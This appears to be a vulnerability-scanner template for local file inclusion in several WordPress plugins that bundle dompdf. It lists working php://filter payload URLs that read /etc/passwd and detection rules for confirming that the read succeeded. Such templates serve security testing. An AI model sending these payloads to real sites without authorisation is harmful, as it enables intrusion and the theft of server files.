id: wordpress-dompdf-lfi
info:
  name: DOM PDF Multiples Wordpress LFI
  risk: High
  confidence: Certain

params:
  - root: '{{.BaseURL}}'

replicate:
  prefixes: 'blog, news, docs'

variables:
  - vul: |
      wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd
      wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd
      wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd
      wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd
      wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd
      wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd
      wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd

requests:
  - method: POST
    redirect: false
    url: >-
      {{.root}}/{{.vul}}
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", 'root:') && StringSearch("response", 'bin:x:')
      - >-
        StatusCode() == 200 && StringSearch("response", 'cm9vdDp4')

references:
  - link1: https://wpvulndb.com/vulnerabilities/10149
